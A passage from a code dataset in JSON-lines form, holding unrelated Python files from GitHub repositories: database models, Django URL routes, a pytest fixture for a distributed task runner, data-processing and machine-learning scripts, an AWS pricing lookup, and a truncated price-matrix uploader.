__tablename__ = 'sales'\n\n sale_id = database.Column(database.Integer, primary_key = True)\n sale_date = database.Column(database.String)\n costumer_id_cpf = database.Column(database.Integer, database.ForeignKey('costumers.costumer_id_cpf'))\n products = database.Column(database.JSON, nullable = True, default = []) # Try to delete nullable and test it\n total = database.Column(database.Float(precision = 2), default = 0)\n\n\n def __init__(self, costumer_id_cpf: str, products: list):\n self.sale_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\n self.costumer_id_cpf = costumer_id_cpf\n self.products = products\n self.total = round(sum([product.get('value', 0)*product.get('quantity', 0) for product in self.products]),2)\n \n\n @classmethod\n def find_sale(cls, sale_id: str):\n sale = cls.query.filter_by(sale_id = sale_id).first()\n \n if sale:\n return sale\n return None\n\n\n def to_json(self) -> dict:\n return {\n 'sale_id' : self.sale_id, \n 'sale_date' : self.sale_date,\n 'costumer_id_cpf' : self.costumer_id_cpf,\n 'products' : self.products,\n 'total' : self.total\n }\n\n\n def save(self):\n database.session.add(self)\n database.session.commit()\n\n\n def delete(self):\n database.session.delete(self)\n database.session.commit()","repo_name":"nnbuainain/cash_back_api_app","sub_path":"models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43391818403","text":"from tkinter import *\n\nroot = Tk()\n\ntxt = \"成人限制!\\n十八禁!\"\nphoto = PhotoImage(file = \"18.gif\")\n\ntheLabel = Label(root, text=txt,\n\t\t\t\t justify=LEFT,\n\t\t\t\t image=photo,\n\t\t\t\t compound=CENTER,\n\t\t\t\t font=(\"华康少女字体\", 20),\n\t\t\t\t fg=\"white\")\ntheLabel.pack()\n\nmainloop()\n","repo_name":"Esirn/Learn_Python","sub_path":"p15_4.py","file_name":"p15_4.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32063908295","text":"# coding: utf-8\n\"\"\"Test the master talking to the slave\"\"\"\n\nimport logging\nimport os\nimport threading\nimport signal\nimport subprocess\nimport sys\nimport time\n\nimport pytest\n\nfrom drmaa_futures.master import ZeroMQListener\n\nlogger = logging.getLogger(__name__)\n\ndef wait_until(condition, interval=0.1, timeout=1, *args):\n \"\"\"Simple convenience function to wait for a condition.\"\"\"\n start = time.time()\n while not condition(*args) and time.time() - start < timeout:\n time.sleep(interval)\n\n@pytest.fixture\ndef master():\n zmq = ZeroMQListener()\n zmq._socket.LINGER = 300\n run = True\n\n def _do_thread():\n try:\n while run:\n zmq.process_messages()\n except Exception as e:\n logger.error(\"Got exception in worker thread: %s\", e)\n logger.error(traceback.format_exc())\n\n thread = threading.Thread(target=_do_thread)\n # Allow loose test threads?\n # thread.daemon = True\n thread.start()\n yield zmq\n run = False\n logger.debug(\"Ended test loop\")\n thread.join()\n zmq.shutdown()\n\n\n@pytest.fixture\ndef slave(master):\n # def slave(url=None, id=\"0\", timeout=None):\n # We need to update the environment to include this file, so that we can unpickle it's functions\n new_env = dict(os.environ)\n new_env[\"PYTHONPATH\"] = \":\".join(\n new_env.get(\"PYTHONPATH\", \"\").split(\":\") + [os.path.dirname(__file__)])\n\n url = [master.endpoint]\n timeout = [\"--timeout=3\"]\n proc = subprocess.Popen(\n [sys.executable, \"-m\", \"drmaa_futures\", \"-v\", \"slave\"] + timeout + url,\n env=new_env)\n try:\n time.sleep(0.2)\n yield proc\n finally:\n try:\n # Kill in a gentle way\n os.kill(proc.pid, signal.SIGINT)\n proc.wait()\n except OSError:\n # On python2 trying to kill something that has just died seems to error\n pass\n\n\ndef test_worker_registered(master, slave):\n # Since we could have lag here, explicitly wait for a bit to give time to connect\n wait_until(lambda: master.active_workers, timeout=5)\n assert master.active_workers\n\ndef test_task_enqueue(master, slave):\n task = master.enqueue_task(lambda: 42)\n assert task.result(timeout=2) == 42\n\n task = master.enqueue_task(lambda: 42)\n assert task.cancel()\n task2 = master.enqueue_task(lambda: 1337)\n assert task2.result(timeout=2) == 1337\n\n","repo_name":"ndevenish/drmaa_futures","sub_path":"tests/test_master_slave.py","file_name":"test_master_slave.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25068170466","text":"from django.conf.urls import include, url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nfrom . import views\n\nurlpatterns = [\n url(\n regex=r'^$',\n view=views.EventList.as_view(),\n name='list'\n ),\n\n url(r'^api-token-auth/', obtain_jwt_token),\n # url(\n # regex=r'^(?P[\\w_\\-]+)/(?P\\d+)/$',\n # view=views.InviteeURL.as_view(),\n # name='invitee-url'\n # ),\n\n url(\n regex=r'^emails/(?P\\d+)/$',\n view=views.EmailCreate.as_view(),\n name='email-create'\n ),\n\n url(r'^emails/$', views.upload_csv, name='upload_csv'),\n # url(\n # regex=r'^emails/export/$',\n # view=views.export,\n # name='email-export'\n # ),\n\n # url(\n # regex=r'^emails/delete/(?P\\d+)/$',\n # view=views.EmailDelete.as_view(),\n # name='email-delete'\n # ),\n\n url(\n regex=r'^emails/delete/$',\n view=views.delete_post,\n name='email-delete'\n ),\n\n url(\n regex=r'^create/$',\n view=views.EventCreate.as_view(),\n name='create'\n ),\n\n url(\n regex=r'^update/(?P\\d+)/$',\n view=views.EventUpdate.as_view(),\n name='update'\n ),\n\n url(\n regex=r'^delete/(?P\\d+)/$',\n view=views.EventDelete.as_view(),\n name='delete'\n ),\n\n url(\n regex=r'^location/delete/(?P\\d+)/$',\n view=views.LocationDelete.as_view(),\n name='l-delete'\n ),\n\n url(\n regex=r'^location/update/(?P\\d+)/$',\n view=views.LocationUpdate.as_view(),\n name='l-update'\n ),\n\n url(\n regex=r'^(?P\\d+)/$',\n view=views.EventDetail.as_view(),\n name='detail'\n ),\n\n url(\n regex=r'^(?P\\d+)/location/$',\n view=views.LocationCreate.as_view(),\n name='l-create'\n ),\n\n # Edit URLs\n\n # Edit form entry\n url(r'^collections/edit/(?P\\d+)/$',\n views.edit_form_entry,\n name='fobi.edit_form_entry'),\n\n # # Edit form entry\n # url(r'^forms/edit/(?P\\d+)/$',\n # views.edit_form_entry,\n # name='fobi.edit_form_entry'),\n\n # url(r'^snippets/$', api_view.UserEventList.as_view()),\n # url(r'^snippets/(?P[\\w_\\-]+)/$', api_view.SnippetDetail.as_view()),\n\n\n # View form entry for guests\n url(r'^(?P[\\w_\\-]+)/$',\n views.view_form_entry,\n name='fobi.view_form_entry'),\n\n # View form entry for public\n url(r'^a/(?P[\\w_\\-]+)/$',\n views.view_form_entry_public,\n name='fobi.view_form_entry_public'),\n\n # Forms dashboard\n url(r'^collections/$', view=views.dashboard, name='fobi.dashboard'),\n\n # Delete form entry\n url(r'^collections/delete/(?P\\d+)/$',\n views.delete_form_entry,\n name='fobi.delete_form_entry'),\n\n # Add form element entry\n url(r'^collections/elements/add/(?P\\d+)/'\n r'(?P[\\w_\\-]+)/$',\n views.add_form_element_entry,\n name='fobi.add_form_element_entry'),\n\n # Edit form element entry\n url(r'^collections/elements/edit/(?P\\d+)/$',\n views.edit_form_element_entry,\n name='fobi.edit_form_element_entry'),\n\n # Delete form element entry\n url(r'^collections/elements/delete/(?P\\d+)/$',\n views.delete_form_element_entry,\n name='fobi.delete_form_element_entry'),\n\n # ***********************************************************************\n # *********************** Form handler entry CUD ************************\n # ***********************************************************************\n\n # Add form handler entry\n url(r'^collections/handlers/add/(?P\\d+)/'\n r'(?P[\\w_\\-]+)/$',\n views.add_form_handler_entry,\n name='fobi.add_form_handler_entry'),\n\n # Edit form handler entry\n url(r'^collections/handlers/edit/(?P\\d+)/$',\n views.edit_form_handler_entry,\n name='fobi.edit_form_handler_entry'),\n\n # Delete form handler entry\n url(r'^collections/handlers/delete/(?P\\d+)/$',\n views.delete_form_handler_entry,\n name='fobi.delete_form_handler_entry'),\n\n # Form submitted success page\n url(r'^view/submitted/$',\n views.form_entry_submitted,\n name='fobi.form_entry_submitted'),\n\n # Form submitted success page\n url(r'^view/(?P[\\w_\\-]+)/submitted/$',\n view=views.form_entry_submitted,\n name='fobi.form_entry_submitted'),\n\n url(r'^collections/plugins/form-handlers/db-store/',\n include('events.contrib.plugins.form_handlers.db_store.urls')),\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","repo_name":"mansonul/events","sub_path":"events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40927875158","text":"import numpy as np\nimport pandas as pd\nimport torch\n\ndf = pd.read_csv('../GDELT/edges.csv')\nselect = np.arange(0, len(df), 100)\n\nnew_df = {\n 'Unnamed: 0': np.arange(len(select)),\n 'src': df.src.values[select],\n 'dst': df.dst.values[select],\n 'time': df.time.values[select],\n 'int_roll': df.int_roll.values[select],\n 'ext_roll': df.ext_roll.values[select],\n}\n\n# create edges.csv\nnew_df = pd.DataFrame(data=new_df)\nnew_df.to_csv('./edges.csv', index=False)\n\n# create edge features\nedge_feats = torch.load('../GDELT/edge_features.pt')\ntorch.save(edge_feats[select], './edge_features.pt')\n\n\n# create node features\nnode_feats = torch.load('../GDELT/node_features.pt')\ntorch.save(node_feats, './node_features.pt')","repo_name":"CongWeilin/GraphMixer","sub_path":"DATA/GDELT_lite/gen_dataset.py","file_name":"gen_dataset.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"52"} +{"seq_id":"8749667452","text":"arq = open('input6.txt', 'r')\n\nquestions = \"\"\ncounter = 0\ncounter2 = 0\ngroup_size = 0\n\nfor line in arq:\n temp = line.split()\n if temp == []:\n counter = counter + len(set(questions))\n for question in set(questions):\n if questions.count(question) == group_size:\n counter2 = counter2 + 1\n questions = \"\"\n group_size = 0\n\n else:\n questions = questions + temp[0]\n group_size = group_size + 1\n\nif questions != \"\":\n counter = counter + len(set(questions))\n for question in set(questions):\n if questions.count(question) == group_size:\n counter2 = counter2 + 1\n questions = \"\"\n group_size = 0\n\nprint(counter)\nprint(counter2)","repo_name":"albertineweber/Advent-of-Code-2020","sub_path":"day06/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"14833460132","text":"import json\nimport sys\nimport os.path\n\nimport boto3\nfrom pprint import pprint\nimport json\nfrom urllib.request import urlopen\n\n#pricing_client = None\n\n\ndef price_lookup(args: list):\n if len(args) == 0:\n print(\"ERROR: No price list provided\")\n return\n\n filepath = args[0]\n if not os.path.exists(filepath):\n print(f\"ERROR: Unable to fine {filepath}\")\n return\n\n with open(filepath) as f:\n data = json.load(f)\n\n print(f\"Loaded {filepath}\")\n for region_data in data['config']['regions']:\n region = region_data['region']\n for instance_data in region_data['instanceTypes']:\n for size_data in instance_data['sizes']:\n size = size_data['size']\n cpu = size_data['vCPU']\n mem = size_data['memoryGiB']\n price = size_data['valueColumns'][0]['prices']['USD']\n print(f\"{region},{size},{cpu},{mem},{price}\")\n\n\n\ndef get_products(region, instanceType):\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n paginator = pricing_client.get_paginator('get_products')\n\n response_iterator = paginator.paginate(\n ServiceCode=\"AmazonEC2\",\n Filters=[\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'location',\n 'Value': region\n },\n {\n 'Type': 'TERM_MATCH',\n 'Field': 'instanceType',\n 'Value': instanceType\n }\n ],\n PaginationConfig={\n 'PageSize': 100\n }\n )\n\n products = []\n for response in response_iterator:\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n products.append(priceItemJson)\n\n print(json.dumps(products, indent=4))\n\nif __name__ == '__main__':\n get_products('US East (N. Virginia)', 'c5a.2xlarge')\n #price_lookup(sys.argv[1:])\n\n","repo_name":"ksuderman/Experiments","sub_path":"aws/bin/pricing.py","file_name":"pricing.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43829268718","text":"import tensorflow as tf\nimport numpy as np\nfrom utils import *\nfrom gdnn import GDNN\nimport networkx as nx\nfrom load_data import load_nci\nfrom evaluate_embedding import evaluate_embedding\n# Newloader\nfrom graph.dataset import load\n\n\n\ndef fold_cv(data_index, FLAGS):\n if_train = FLAGS.train\n FLAGS = tf.app.flags.FLAGS\n cv_index = FLAGS.cv_index\n num_epochs = FLAGS.num_epochs\n tag_size = FLAGS.labels\n graph_pad_length = FLAGS.graph_pad_length\n feature_dimension = FLAGS.feature_dimension\n CE_ratio = FLAGS.CE_ratio\n lr = FLAGS.learn_rate\n\n placeholders = {\n 'support': tf.sparse_placeholder(tf.float32),\n 'inverse_support': tf.sparse_placeholder(tf.float32),\n 'features':tf.sparse_placeholder(tf.float32),\n 'labels': tf.placeholder(tf.float32, shape=(graph_pad_length,feature_dimension)),\n 'num_nodes': tf.placeholder(tf.int32),\n 'dropout': tf.placeholder_with_default(0., shape=()),\n 'g_labels': tf.placeholder(tf.float32, shape=())\n }\n with tf.Session() as sess:\n model = GDNN()\n model.build_graph(n=graph_pad_length,placeholders = placeholders,d =feature_dimension)\n with tf.variable_scope('DownstreamApplication'):\n global_step = tf.Variable(0, trainable=False, name='global_step')\n learn_rate = tf.train.exponential_decay(lr, global_step, FLAGS.decay_step, 0.98, staircase=True)\n layer_flat = tf.reshape(model.M,[1,-1])\n labels = placeholders['labels'][:placeholders['num_nodes']] \n logits = model.reconstruct_X[:placeholders['num_nodes']]\n loss = tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(targets=labels,logits=logits,pos_weight = CE_ratio*feature_dimension)) \n p_coef = 0.0\n p_loss = p_coef * model.P\n loss = loss + p_loss\n params = tf.trainable_variables()\n \n # load data\n if data_index == \"proteins\":\n raw_train_structure_input,raw_train_feature_input,raw_test_structure_input,raw_test_feature_input,ally,ty = load_nci(data_index)\n # graph padding\n train_structure_input,train_feature_input = graph_padding(raw_train_structure_input,raw_train_feature_input,graph_pad_length)\n test_structure_input,test_feature_input = graph_padding(raw_test_structure_input,raw_test_feature_input,graph_pad_length)\n else:\n train_structure_input, diff, train_feature_input, ally, num_nodes_all = load(data_index)\n print(train_structure_input[0].shape[-1], train_feature_input[0].shape)\n test_structure_input, diff, test_feature_input, labels, num_nodes = load(data_index)\n total = len(train_feature_input)\n vtotal = len(test_feature_input)\n \n if if_train == True:\n optimizer = tf.train.AdamOptimizer(learn_rate)\n grad_and_vars = tf.gradients(loss, params)\n clipped_gradients, _ = tf.clip_by_global_norm(grad_and_vars, 0.5)\n opt = optimizer.apply_gradients(zip(clipped_gradients, params), global_step=global_step)\n else:\n pass\n sess.run(tf.global_variables_initializer())\n train_emb = []\n if if_train == True:\n hist_loss = []\n for epoch_num in range(num_epochs):\n epoch_loss = 0\n step_loss = 0\n for i in range(int(total)):\n if data_index == \"proteins\":\n num_nodes = raw_train_feature_input[i].shape[0]\n else:\n num_nodes = num_nodes_all[i]\n batch_input,topo, batch_tags,g_l = (train_feature_input[i],train_structure_input[i], train_feature_input[i].todense(),ally[i])\n batch_input = preprocess_features(batch_input.tolil())\n batch_topo = preprocess_adj(topo)\n batch_topo_inverse = preprocess_inverse_adj(topo)\n train_ops = [opt, loss, learn_rate, global_step]\n train_ops += [p_loss]\n feed_dict = construct_feed_dict(batch_input, batch_topo, batch_topo_inverse,batch_tags, num_nodes,g_l,placeholders)\n result = sess.run(train_ops, feed_dict=feed_dict)\n step_loss += result[1]\n epoch_loss += result[1]\n step_loss = 0\n print(\"Epoch:\", '%04d' % (epoch_num), \"train_loss=\", \"{:.5f}\".format(epoch_loss))\n if epoch_num == num_epochs -1:\n for i in range(int(total)):\n num_nodes = num_nodes_all[i]\n batch_input,topo, batch_tags,g_l = (train_feature_input[i],train_structure_input[i], train_feature_input[i].todense(),ally[i])\n batch_input = preprocess_features(batch_input.tolil())\n batch_topo = preprocess_adj(topo)\n batch_topo_inverse = preprocess_inverse_adj(topo)\n train_ops = [opt, loss, learn_rate, global_step]\n train_ops += [p_loss]\n feed_dict = construct_feed_dict(batch_input, batch_topo, batch_topo_inverse,batch_tags, num_nodes,g_l,placeholders)\n result = sess.run(tf.reshape(layer_flat,[-1]), feed_dict=feed_dict)\n train_emb.append(result)\n train_emb = np.array(train_emb)\n np.save('embeddings',train_emb)\n sess.close()\n else:\n pass\n\n if if_train == True:\n prediction = evaluate_embedding(train_emb,ally)\n return prediction\n else:\n train_emb = np.load(\"embeddings.npy\")\n prediction = evaluate_embedding(train_emb,ally)\n return prediction\n\n\n\n","repo_name":"xiyou3368/GDNN","sub_path":"one_fold.py","file_name":"one_fold.py","file_ext":"py","file_size_in_byte":5198,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"35710238176","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: the given BST\n @param k: the given k\n @return: the kth smallest element in BST\n \"\"\"\n def kthSmallest(self, root, k):\n # write your code here\n \n stack = []\n while root:\n stack.append(root)\n root = root.left\n print(root)\n \n for i in range(k - 1):\n if not stack:\n break\n if stack[-1].right:\n node = stack[-1].right\n print(node)\n while node:\n stack.append(node)\n node = node.left\n\n else:\n node = stack.pop()\n while stack and stack[-1].right == node:\n node = stack.pop()\n \n return stack[-1].val\n \n","repo_name":"LingHsiLiu/Algorithm1","sub_path":"5-Binary Tree - Tree-based DFS/902. Kth Smallest Element in a BST.py","file_name":"902. Kth Smallest Element in a BST.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27361029627","text":"import pandas as pd\nimport numpy as np\nfrom pandas import Series,DataFrame\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error , r2_score\n\nfrom sklearn.model_selection import train_test_split\n\n#导入数据\ndata= pd.read_csv(\"AirQualityUCI.csv\",sep=';', decimal=\",\")\n\ndata.dropna(how='all',inplace=True)#去掉空行\ndata.dropna(thresh=10,axis=0,inplace=True)#rh为空\ndata.dropna(axis=1, how= 'all', inplace=True)\ndata = data.replace(-200, np.nan)\nprint(data.isnull().sum())\ndata.drop('NMHC(GT)',axis=1,inplace=True)\ndata['month']=data['Date'].apply(lambda x: int(x.split('/')[1]))\ndata['Time']=data['Time'].apply(lambda x: int(x.split('.')[0]))\ndata['Date']=pd.to_datetime(data.Date, format='%d/%m/%Y')\n\nprint(data.describe())\nfor str in ['PT08.S1(CO)','PT08.S2(NMHC)','PT08.S3(NOx)','PT08.S4(NO2)','PT08.S5(O3)','CO(GT)','C6H6(GT)','NOx(GT)','NO2(GT)','T','AH',\"RH\"]:\n data[str] = data[str].fillna(data.groupby(['Time','month'])[str].transform('mean'))\nprint(data.isnull().sum())\nprint(data.Date.isnull().values.any())\ndata['CO(GT)']=data['CO(GT)'].fillna(data.groupby(['Time'])['CO(GT)'].transform('mean'))\ndata['NOx(GT)']=data['NOx(GT)'].fillna(data.groupby(['Time'])['NOx(GT)'].transform('mean'))\ndata['NO2(GT)']=data['NO2(GT)'].fillna(data.groupby(['Time'])['NO2(GT)'].transform('mean'))\n\nX=data[['PT08.S1(CO)','PT08.S2(NMHC)','PT08.S3(NOx)','PT08.S4(NO2)','PT08.S5(O3)','CO(GT)','C6H6(GT)','NOx(GT)','NO2(GT)','T','month']]\n#X=data[['PT08.S2(NMHC)','PT08.S3(NOx)','PT08.S4(NO2)','NOx(GT)','NO2(GT)','T','month']]\n\nX_train , X_test , y_train ,y_test = train_test_split(X,data['RH'],test_size=0.2,random_state=42)\nregr = linear_model.LinearRegression()\nregr.fit(X_train,y_train)\nprint(regr.score(X_train,y_train))#r2 score\nprint(regr.score(X_test,y_test))#r2 score\nprint('Coefficients: \\n', regr.coef_)\npreditct_test=regr.predict(X_test)\nprint('均方误差: %.3f' % np.sqrt(mean_squared_error(y_test,preditct_test)))\nplt.scatter(preditct_test ,y_test,color ='green')\nplt.axis([0, 90, 0, 90])\nplt.xlabel('predict')\nplt.ylabel('true value')\nplt.show()","repo_name":"sherlockeded/air-quality-data-anlysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31595148719","text":"from .action import Action\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass ForwardToBackendSet(Action):\n \"\"\"\n Action to forward requests to a given backend set.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new ForwardToBackendSet object with values from keyword arguments. The default value of the :py:attr:`~oci.load_balancer.models.ForwardToBackendSet.name` attribute\n of this class is ``FORWARD_TO_BACKENDSET`` and it should not be changed.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param name:\n The value to assign to the name property of this ForwardToBackendSet.\n Allowed values for this property are: \"FORWARD_TO_BACKENDSET\"\n :type name: str\n\n :param backend_set_name:\n The value to assign to the backend_set_name property of this ForwardToBackendSet.\n :type backend_set_name: str\n\n \"\"\"\n self.swagger_types = {\n 'name': 'str',\n 'backend_set_name': 'str'\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'backend_set_name': 'backendSetName'\n }\n\n self._name = None\n self._backend_set_name = None\n self._name = 'FORWARD_TO_BACKENDSET'\n\n @property\n def backend_set_name(self):\n \"\"\"\n **[Required]** Gets the backend_set_name of this ForwardToBackendSet.\n Name of the backend set the listener will forward the traffic to.\n\n Example: `backendSetForImages`\n\n\n :return: The backend_set_name of this ForwardToBackendSet.\n :rtype: str\n \"\"\"\n return self._backend_set_name\n\n @backend_set_name.setter\n def backend_set_name(self, backend_set_name):\n \"\"\"\n Sets the backend_set_name of this ForwardToBackendSet.\n Name of the backend set the listener will forward the traffic to.\n\n Example: `backendSetForImages`\n\n\n :param backend_set_name: The backend_set_name of this ForwardToBackendSet.\n :type: str\n \"\"\"\n self._backend_set_name = backend_set_name\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/load_balancer/models/forward_to_backend_set.py","file_name":"forward_to_backend_set.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"18698250466","text":"from decimal import Decimal\nfrom django.conf import settings\nfrom django.db import transaction\nfrom book_rental.models.sales.book import Book\nfrom ecommerce.models.rent_plan import RentPlan\nfrom ecommerce.models.sales.rent_plan_relation import RentPlanRelation\nfrom engine.clock.Clock import Clock\nfrom generics.libs.loader.loader import load_model\nfrom logger.models.error_log import ErrorLog\nfrom payment.models.currency import Currency\n\n\nclass PriceMatrixUploader(object):\n def __init__(self, data=[], *args, **kwargs):\n self.data = data\n self.args = args\n self.kwargs = kwargs\n \n def handle_sale_price_upload(self):\n PriceMatrix = load_model(app_label=\"ecommerce\", model_name=\"PriceMatrix\")\n for row in self.data:\n with transaction.atomic():\n index = 0\n product_code = row[index]\n index += 1\n is_new = row[index]\n index += 1\n print_type = row[index]\n index += 1\n market_price = row[index]\n index += 1\n base_price = row[index]\n index += 1\n sale_price = row[index]\n index += 1\n initial_rent_payable_price = row[index]\n index += 1\n is_special_sale = row[index]\n index += 1\n special_sale_rate = row[index]\n index += 1\n offer_start_date = row[index]\n index += 1\n offer_end_date = row[index]\n index += 1\n currency = row[index]\n \n if any( [ not item for item in [ product_code, is_new, print_type, market_price, base_price, currency ] ] ):\n error_log = ErrorLog()\n error_log.url = ''\n error_log.stacktrace = 'Missing data.'\n error_log.save()\n continue\n \n product_objects = Book.objects.filter(code=product_code)\n if product_objects.exists():\n product_object = product_objects.first()\n else:\n ErrorLog.log(url='', stacktrace='Invalid product code supplied. Skipping... Data %s' % product_code)\n continue\n try:\n is_new = int(is_new)\n if is_new != 1 and is_new != 0:\n ErrorLog.log(url='', stacktrace='Invalid is_new supplied. 1 or 0 expected. Skipping... Data %s' % row)\n continue\n if is_new == 1:\n is_new = True\n else:\n is_new = False\n except:\n ErrorLog.log(url='', stacktrace='Invalid is_new supplied. 1 or 0 expected. Skipping... Data %s' % row)\n continue\n \n if not print_type in settings.SUPPORTED_PRINTING_TYPES:\n ErrorLog.log(url='', stacktrace='printing type must be in %s. Skipping...' % settings.SUPPORTED_PRINTING_TYPES)\n continue\n\n try:\n market_price = Decimal(market_price)\n except:\n ErrorLog.log(url='', stacktrace='Invalid market_price value. Decimal expected. Given: %s' % row)\n continue\n \n try:\n base_price = Decimal(base_price)\n except:\n ErrorLog.log(url='', stacktrace='Invalid base_price value. Decimal expected. Given: %s' % row)\n continue\n \n try:\n if sale_price:\n sale_price = Decimal(sale_price)\n except:\n ErrorLog.log(url='', stacktrace='Invalid sale_price value. Decimal expected. Given: %s' % row)\n continue\n \n try:\n if initial_rent_payable_price:\n initial_rent_payable_price = Decimal(initial_rent_payable_price)\n except:\n ErrorLog.log(url='', stacktrace='Invalid initial_rent_payable_price value. Decimal expected. Given: %s' % row)\n continue\n \n try:\n is_special_sale = int(is_special_sale) if is_special_sale else 0\n if is_special_sale != 1 and is_special_sale != 0:\n ErrorLog.log(url='', stacktrace='Invalid is_special_sale supplied. 1 or 0 expected. Skipping... Data %s' % row)\n continue\n if is_special_sale == 1:\n is_special_sale = True\n else:\n is_special_sale = False\n except:\n ErrorLog.log(url='', stacktrace='Invalid is_special_sale supplied. 1 or 0 expected. Skipping... Data %s' % row)\n continue\n \n try:\n special_sale_rate = Decimal(special_sale_rate)\n except:\n if is_special_sale:\n ErrorLog.log(url='', stacktrace='Invalid special_sale_rate value. Decimal expected. Given: %s' % row)\n continue\n \n try:\n offer_start_date = offer_start_date\n except:\n if is_special_sale:\n ErrorLog.log(url='', stacktrace='Invalid offer_start_date value. Skipping... Expected format: dd/mm/yyyy. Given' % row)\n continue\n \n try:\n offer_end_date = offer_end_date\n except:\n if is_special_sale:\n ErrorLog.log(url='', stacktrace='Invalid offer_end_date value. Skipping... Expected format: dd/mm/yyyy. Given' % row)\n continue\n \n currency_objects = Currency.objects.filter(short_name=currency)\n if currency_objects.exists():\n currency_object = currency_objects.first()\n else:\n ErrorLog.log(url='', stacktrace='Invalid currency code value. Skipping...Data: ' % row)\n continue\n\n price_objects = PriceMatrix.objects.filter(product_model='Book', product_code=product_code, is_new=is_new, print_type=print_type)\n\n if price_objects.exists():\n price_object = price_objects.first()\n else:\n price_object = PriceMatrix(product_model='Book', product_code=product_code, is_new=is_new, print_type=print_type)\n\n price_object.is_rent = False\n price_object.market_price = market_price\n price_object.base_price = base_price\n price_object.currency_id = currency_object.pk\n if is_special_sale:\n offer_start_ts = Clock.convert_datetime_to_timestamp(offer_start_date)\n offer_end_ts = Clock.convert_datetime_to_timestamp(offer_end_date)\n price_object.offer_date_start = offer_start_ts\n price_object.offer_date_end = offer_end_ts\n price_object.special_price = is_special_sale\n if is_special_sale:\n price_object.offer_price_p = float(special_sale_rate) / 100\n price_object.offer_price_v = float(base_price) * (float(special_sale_rate) / 100)\n else:\n price_object.offer_price_p = 1.0\n price_object.offer_price_v = base_price\n \n if sale_price:\n price_object.sale_price = sale_price\n \n if initial_payable_rent_price:\n price_object.initial_payable_rent_price = initial_payable_rent_price\n\n price_object.save()\n #Price Saved.\n\n def handle_rent_price_upload(self):\n for row in self.data:\n with transaction.atomic():\n index = 0\n rent_code = row[index]\n index += 1\n product_code = row[index]\n index += 1\n is_new = row[index]\n index += 1\n print_type = row[index]\n index += 1\n price_in_percentage = row[index]\n index += 1\n is_special_rent = row[index]\n index += 1\n special_rent_rate = row[index]\n index += 1\n offer_start_date = row[index]\n index += 1\n offer_end_date = row[index]\n index += 1\n currency = row[index]\n \n if any( [ not item for item in [ rent_code, product_code, is_new, print_type, price_in_percentage, currency ] ] ):\n error_log = ErrorLog()\n error_log.url = ''\n error_log.stacktrace = 'Missing data.'\n error_log.save()\n continue\n \n product_objects = Book.objects.filter(code=product_code)\n if product_objects.exists():\n product_object = product_objects.first()\n else:\n ErrorLog.log(url='', stacktrace='Invalid product code supplied. Skipping... Data %s' % product_code)\n continue\n \n try:\n is_new = int(is_new)\n if is_new != 1 and is_new != 0:\n ErrorLog.log(url='', stacktrace='Invalid is_new supplied. 1 or 0 expected. Skipping... Data %s' % row)\n continue\n if is_new == 1:\n is_new = True\n else:\n is_new = False\n except:\n ErrorLog.log(url='', stacktrace='Invalid is_new supplied. 1 or 0 expected. Skipping... Data %s' % row)\n continue\n \n if not print_type in settings.SUPPORTED_PRINTING_TYPES:\n ErrorLog.log(url='', stacktrace='printing type must be in %s. Skipping...' % settings.SUPPORTED_PRINTING_TYPES)\n continue\n \n try:\n price_in_percentage = Decimal(price_in_percentage)\n except:\n ErrorLog.log(url='', stacktrace='Invalid price_in_percentage value. Decimal expected. Given: %s' % row)\n continue\n \n try:\n is_special_rent = int(is_special_rent)\n if is_special_rent != 1 and is_special_rent != 0:\n ErrorLog.log(url='', stacktrace='Invalid is_special_rent supplied. 1 or 0 expected. Skipping... Data 